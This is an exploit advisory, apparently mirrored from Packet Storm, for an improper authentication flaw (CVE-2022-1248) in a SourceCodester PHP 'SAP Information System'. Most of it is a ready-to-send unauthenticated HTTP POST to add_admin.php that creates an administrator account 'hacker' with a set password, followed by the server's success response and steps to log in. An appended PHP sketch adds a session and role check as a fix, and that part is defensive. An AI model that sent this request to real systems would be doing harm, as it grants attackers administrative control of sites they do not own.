## https://sploitus.com/exploit?id=PACKETSTORM:166609
# Exploit Title: SAP Information System 1.0.0 - Improper Authentication  
# Date: 06/04/2022  
# CVE: CVE-2022-1248  
# Exploit Author: Mr Empy  
# Software Link: https://www.sourcecodester.com/php/15262/sap-information-system-using-phppdo-oop.html
# Version: 1.0.0  
# Tested on: Linux  
  
  
Title:  
================  
SAP Information System 1.0.0 - Improper Authentication  
  
  
Summary:  
================  
SAP Information System version 1.0.0 suffers from an improper
authentication vulnerability that allows a malicious user to create an
administrative account without needing to authenticate. The POST request is
sent to the /SAP_Information_System/controllers/add_admin.php endpoint. The
problem occurs due to a lack of session verification in the request.
  
  
Severity Level:  
================  
7.3 (High)  
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L  
  
  
Affected Product:  
================  
SAP Information System version v1.0.0  
  
  
Steps to Reproduce:  
================  
  
1. Copy this request and change the host and send it to the server:  
  
############################################  
  
POST /SAP_Information_System/controllers/add_admin.php HTTP/1.1  
Host: target.com  
Content-Length: 345  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYELEK8fMdX63l0iI
Origin: http://target.com  
Referer: http://target.com/SAP_Information_System/Dashboard/pages/Admin.php  
Accept-Encoding: gzip, deflate  
Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7  
Cookie: PHPSESSID=jjnkf4nmpdm7sca82btt2r4s1c  
Connection: close  
  
------WebKitFormBoundaryYELEK8fMdX63l0iI  
Content-Disposition: form-data; name="username"  
  
hacker  
------WebKitFormBoundaryYELEK8fMdX63l0iI  
Content-Disposition: form-data; name="password"  
  
P@ssw0rd!  
------WebKitFormBoundaryYELEK8fMdX63l0iI  
Content-Disposition: form-data; name="user"  
  
admin  
------WebKitFormBoundaryYELEK8fMdX63l0iI--  
  
############################################  
  
Reply:  
  
############################################  
  
HTTP/1.1 200 OK  
Date: Tue, 05 Apr 2022 16:15:46 GMT  
Server: Apache  
Vary: Accept-Encoding  
Content-Length: 267  
Connection: close  
Content-Type: text/html; charset=UTF-8  
  
  
<script type="text/javascript">setTimeout(function () { swal("Add Admin  
Successfully!","Message!","success");}, 1000);</script><script  
type="text/javascript">setTimeout(function(){window.location =  
"/SAP_Information_System/Dashboard/pages/Admin.php"},1000)</script>  
  
############################################  
  
2. Go to the login page and enter the credentials hacker:P@ssw0rd!. After
that you will be logged in with an administrative account.
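
Mitigation sketch:
================
A session and role check for the top of controllers/add_admin.php, covering the missing session verification named in the Summary. This is an added example, not part of the original advisory or the application's own code; the session keys user_id and role are assumptions, since the advisory does not show how the application stores login state.

```php
<?php
declare(strict_types=1);

// Added example: guard for controllers/add_admin.php.
// ASSUMPTION: the login code stores the account id in $_SESSION['user_id']
// and the account type in $_SESSION['role']. Adjust to the real key names.

/**
 * Stop the request with an HTTP error before any account logic runs.
 * Logging the refusal gives defenders a record of unauthenticated attempts.
 */
function deny(int $status, string $reason): void
{
    http_response_code($status);
    header('Content-Type: text/plain; charset=UTF-8');
    error_log(sprintf(
        'add_admin.php denied: %d %s (client %s)',
        $status,
        $reason,
        $_SERVER['REMOTE_ADDR'] ?? 'unknown'
    ));
    exit($reason);
}

/**
 * Allow the request only for a logged-in administrator.
 * A PHPSESSID cookie by itself proves nothing: the server-side session
 * data must show that a login actually took place.
 */
function require_admin_session(): void
{
    session_start();

    if (($_SERVER['REQUEST_METHOD'] ?? '') !== 'POST') {
        deny(405, 'Method not allowed');
    }
    // No login recorded in the session: the case the advisory describes.
    if (empty($_SESSION['user_id'])) {
        deny(401, 'Authentication required');
    }
    // Logged in, but not as an administrator.
    if (($_SESSION['role'] ?? '') !== 'admin') {
        deny(403, 'Administrator role required');
    }
}

require_admin_session();
// The existing account-creation code runs only past this point.
```

With this check in place, the request in step 1 receives a 401 response instead of the "Add Admin Successfully!" reply, and each refusal is written to the PHP error log.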